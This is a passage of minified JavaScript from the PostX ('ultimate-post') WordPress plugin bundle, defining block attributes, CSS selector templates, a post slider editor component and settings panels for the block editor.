}"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"15"},style:[{selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { padding-bottom: {{septSpace}}px; }    \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { margin-bottom: {{septSpace}}px; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},lgInnerPadding:{type:"object",default:{lg:{top:25,bottom:25,left:25,right:25,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content  { padding: {{lgInnerPadding}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},columnFlip:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Module #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,  \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; }  \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,  \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active,  \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,  \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advanceAttr","advFilter","heading","pagiBlockCompatibility","pagination","video","meta","category","readMore","query"],["pagiMargin"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},72528:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(64988),n=l(16128),r=l(65994);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-module-2/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-module-2.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postmodule2.svg"}},edit:i.Z,save:()=>null})},40181:(e,t,l)=>{"use strict";l.d(t,{Z:()=>U});var o=l(67294),a=l(46066),i=l(64766),n=l(53049),r=l(23890),s=l(49491),p=l(29236),c=l(46896),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(25335),b=l(73151),v=l(69735),h=l(2963),f=l(39349),k=l(87025),w=l(92807);const{__}=wp.i18n,{InspectorControls:x,useBlockProps:T}=wp.blockEditor,{useEffect:_,useState:C,useRef:E,Fragment:S}=wp.element,{Spinner:P,Placeholder:L}=wp.components,{getBlockAttributes:I,getBlockRootClientId:B}=wp.data.select("core/block-editor");function U(e){const t=E(null),[l,U]=C(k.Ti),[M,A]=C(null),{setAttributes:H,clientId:N,className:j,name:Z,isSelected:O,attributes:R,context:D,attributes:{blockId:z,imageShow:F,imgCrop:W,readMoreIcon:V,arrowStyle:G,arrows:q,fade:$,dots:K,slideSpeed:J,autoPlay:Y,readMore:X,readMoreText:Q,excerptLimit:ee,metaStyle:te,catShow:le,metaSeparator:oe,titleShow:ae,catStyle:ie,catPosition:ne,titlePosition:re,excerptShow:se,metaList:pe,metaShow:ce,headingShow:ue,headingStyle:de,headingAlign:me,headingURL:ge,headingText:ye,headingBtnText:be,subHeadingShow:ve,subHeadingText:he,metaPosition:fe,imgOverlay:ke,imgOverlayType:we,contentVerticalPosition:xe,contentHorizontalPosition:Te,showFullExcerpt:_e,customCatColor:Ce,onlyCatColor:Ee,contentTag:Se,titleTag:Pe,showSeoMeta:Le,titleLength:Ie,metaMinText:Be,metaAuthorPrefix:Ue,titleStyle:Me,metaDateFormat:Ae,slidesToShow:He,authorLink:Ne,fallbackEnable:je,headingTag:Ze,notFoundMessage:Oe,dcEnabled:Re,dcFields:De,V4_1_0_CompCheck:{runComp:ze},advanceId:Fe,previewImg:We,currentPostId:Ve}}=e;function Ge(e){U({...l,selectedDC:e})}function qe(){U({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function $e(e){U({...l,section:{...k.ZQ,[e]:!0}}),(0,k.Rt)(e),(0,k.ob)(e),A("setting")}function Ke(e){U((t=>({...t,toolbarSettings:e}))),(0,k.os)(e)}function Je(){l.error&&U({...l,error:!1}),l.loading||U({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,n.Ld)(R)}).then((e=>{U({...l,postsList:e,loading:!1})})).catch((e=>{U({...l,loading:!1,error:!0})}))}function Ye(e,t){e.stopPropagation(),$e("arrow"),Ke("arrow"),t()}_((()=>{(0,k.oA)(),Je()}),[]),_((()=>{const t=N.substr(0,6),l=I(B(N));(0,b.h)(e),(0,n.qi)(H,l,Ve,N),z?z&&z!=t&&(l?.hasOwnProperty("ref")||(0,n.k0)()||l?.hasOwnProperty("theme")||H({blockId:t})):(H({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&H({queryType:"archiveBuilder"}))}),[N]),_((()=>{const e=t.current;(0,v.o6)()&&0===R.dcFields.length&&H({dcFields:Array(w.PR).fill(void 0)}),e?((0,n.Qr)(e,R)&&(Je(),t.current=R),e.isSelected!==O&&O&&(0,k.gT)($e,Ke)):t.current=R}),[R]);const Xe={settingTab:M,setSettingTab:A,setAttributes:H,name:Z,attributes:R,setSection:$e,section:l.section,clientId:N,context:D,setSelectedDc:Ge,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ge(e),Ke("dc_group")}};let Qe;if(z&&(Qe=(0,m.Kh)(R,"ultimate-post/post-slider-1",z,(0,n.k0)())),We)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:We});const et=T({...Fe&&{id:Fe},className:`ultp-block-${z} ${j}`,onClick:e=>{e.stopPropagation(),$e("general"),Ke("")}});return(0,o.createElement)(S,null,(0,o.createElement)(w.FP,{store:Xe,selected:l.toolbarSettings}),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"feat_toggle",label:__("Slider Features","ultimate-post"),data:[...n.$m,{type:"toggle",key:"imageShow",label:__("Image","ultimate-post")}],new:n.KE,[ze?"exclude":"dep"]:n.N2}],store:Xe}),(0,o.createElement)(x,null,(0,o.createElement)(w.ZP,{store:Xe})),(0,o.createElement)("div",et,Qe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Qe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},function(){const e=`${Se}`,t={arrows:q,dots:K,autoplay:Y,autoplaySpeed:J,nextArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=G.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{Ye(e,l)}},i.ZP[a[1]])}),null),prevArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=G.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{Ye(e,l)}},i.ZP[a[0]])}),null)};void 0!==He.lg&&parseInt(He.lg)<2?(t.fade=$,t.slidesToShow=1):(t.slidesToShow=parseInt(He.lg),t.responsive=[{breakpoint:1024,settings:{slidesToShow:parseInt(He.sm)||1,slidesToScroll:1}},{breakpoint:600,settings:{slidesToShow:parseInt(He.xs)||1,slidesToScroll:1}}]),t.appendDots=e=>(0,o.createElement)("div",{onClick:e=>function(e){e.stopPropagation(),$e("dot"),Ke("dot")}(e)},(0,o.createElement)("ul",null," ",e," "));const m=(0,n.fk)(t),g=(e,t)=>(0,v.o6)()&&Re&&(0,o.createElement)(f.Z,{idx:e,postId:t,fields:De,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ke(t)},selectedDC:l.selectedDC,setSelectedDc:Ge,setAttributes:H,dcFields:De});return l.error?(0,o.createElement)(L,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(L,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(P,null)):l.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("div",{onClick:e=>{e.preventDefault(),$e("heading"),Ke("heading")}},(0,o.createElement)(y.Z,{props:{headingShow:ue,headingStyle:de,headingAlign:me,headingURL:ge,headingText:ye,setAttributes:H,headingBtnText:be,subHeadingShow:ve,subHeadingText:he,headingTag:Ze}})),(0,o.createElement)(a.Z,m,l.postsList.map(((t,l)=>{const a=JSON.parse(pe.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:l,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-slider-wrap"},(0,o.createElement)("div",{className:"ultp-block-image-inner"},(t.image&&!t.is_fallback||je)&&F&&(0,o.createElement)(p.xj,{imgOverlay:ke,imgOverlayType:we,post:t,fallbackEnable:je,idx:l,imgCrop:W,onClick:()=>{}})),(0,o.createElement)(p.UU,{contentHorizontalPosition:Te,contentVerticalPosition:xe,onClick:e=>{e.stopPropagation(),$e("image"),Ke("image")}},(0,o.createElement)("div",{className:"ultp-block-content-inner"},(0,o.createElement)(r.Z,{post:t,catShow:le,catStyle:ie,catPosition:ne,customCatColor:Ce,onlyCatColor:Ee,onClick:e=>{$e("taxonomy-/-category"),Ke("cat")}}),g(6,t.ID),t.title&&ae&&1==re&&(0,o.createElement)(d.Z,{title:t.title,headingTag:Pe,titleLength:Ie,titleStyle:Me,onClick:e=>{$e("title"),Ke("title")}}),g(5,t.ID),ce&&"top"==fe&&(0,o.createElement)(c.Z,{meta:a,post:t,metaSeparator:oe,metaStyle:te,metaMinText:Be,metaAuthorPrefix:Ue,metaDateFormat:Ae,authorLink:Ne,onClick:e=>{$e("meta"),Ke("meta")}}),g(4,t.ID),t.title&&ae&&0==re&&(0,o.createElement)(d.Z,{title:t.title,headingTag:Pe,titleLength:Ie,titleStyle:Me,onClick:e=>{$e("title"),Ke("title")}}),g(3,t.ID),se&&(0,o.createElement)(s.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:ee,showFullExcerpt:_e,showSeoMeta:Le,onClick:e=>{$e("excerpt"),Ke("excerpt")}}),g(2,t.ID),X&&(0,o.createElement)(u.Z,{readMoreText:Q,readMoreIcon:V,titleLabel:t.title,onClick:()=>{$e("read-more"),Ke("read-more")}}),g(1,t.ID),ce&&"bottom"==fe&&(0,o.createElement)(c.Z,{meta:a,post:t,metaSeparator:oe,metaStyle:te,metaMinText:Be,metaAuthorPrefix:Ue,metaDateFormat:Ae,authorLink:Ne,onClick:e=>{$e("meta"),Ke("meta")}}),g(0,t.ID),(0,v.o6)()&&Re&&(0,o.createElement)(h.Z,{dcFields:De,setAttributes:H,startOnboarding:qe})))))})))):(0,o.createElement)(L,{className:"ultp-backend-block-loading",label:Oe})}())))}},92807:(e,t,l)=>{"use strict";l.d(t,{FP:()=>y,PR:()=>m,ZP:()=>g});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(92637),d=l(43581);const{__}=wp.i18n,m=7;function g({store:e}){const{section:t,settingTab:l,setSettingTab:n}=e,{V4_1_0_CompCheck:{runComp:r}}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6840",store:e}),(0,o.createElement)(u.Sections,{settingTab:l,setSettingTab:n},(0,o.createElement)(u.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(u.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:t.general,store:e,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:2,data:{type:"range",key:"slidesToShow",min:1,max:8,step:1,responsive:!0,label:__("Number of Slide","ultimate-post")}},{position:3,data:{type:"range",key:"height",label:__("Height","ultimate-post"),min:0,max:1e3,step:1,unit:!0,responsive:!0}},{position:4,data:{type:"range",key:"slideSpeed",min:0,max:1e4,step:100,label:__("Slide Speed","ultimate-post")}},{position:5,data:{type:"range",key:"sliderGap",min:0,max:100,label:__("Slider Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"autoPlay",label:__("Auto Play","ultimate-post")}},{position:7,data:{type:"toggle",key:"fade",label:__("Animation Fade","ultimate-post")}},{position:8,data:{type:"toggle",key:"dots",label:__("Dots","ultimate-post")}},{position:9,data:{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")}},{position:10,data:{type:"toggle",key:"preLoader",label:__("Pre Loader","ultimate-post")}}],exclude:["columns","columnGridGap"]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:t.title,hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:t.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],hrIdx:[{tab:"settings",hr:[1,9]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:t.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:t["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:t["read-more"],depend:"readMore"}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:t.excerpt,store:e,hrIdx:[3,6]}),(0,o.createElement)(a.tf,{depend:"arrows",store:e,initialOpen:t.arrow}),(0,o.createElement)(a.H_,{depend:"dots",store:e,initialOpen:t.dot}),(0,o.createElement)(a.O2,{store:e,exclude:["contentWrapInnerPadding"],include:[{position:0,data:{type:"tag",key:"contentVerticalPosition",label:"Vertical Position",disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]}},{position:1,data:{type:"tag",key:"contentHorizontalPosition",label:__("Horizontal Position","ultimate-post"),disabled:!0,options:[{value:"leftPosition",label:__("Left","ultimate-post")},{value:"centerPosition",label:__("Center","ultimate-post")},{value:"rightPosition",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"separator"}},{position:11,data:{type:"dimension",key:"contentMargin",label:__("Content Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),!r&&(0,o.createElement)(i.Z,{open:t.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:t.heading,depend:"headingShow"}))),(0,o.createElement)(u.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function y({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"arrow":return(0,o.createElement)(r.Z,{text:"Arrow"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.fA)({include:a.I0,exclude:"__all",title:__("Arrow Dimension","ultimate-post")}),store:t,label:__("Arrow Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.fA)({title:__("Arrow Style","ultimate-post"),exclude:["separatorStyle",...a.I0]}),store:t,label:__("Arrow Style","ultimate-post")}));case"dot":return(0,o.createElement)(r.Z,{text:"Dots"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.oc)({include:a.EG,exclude:"__all",title:__("Dots Dimension","ultimate-post")}),store:t,label:__("Dots Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.oc)({title:__("Dots Settings","ultimate-post"),exclude:["separatorStyle",...a.EG]}),store:t,label:__("Dots Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleBackground","titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta 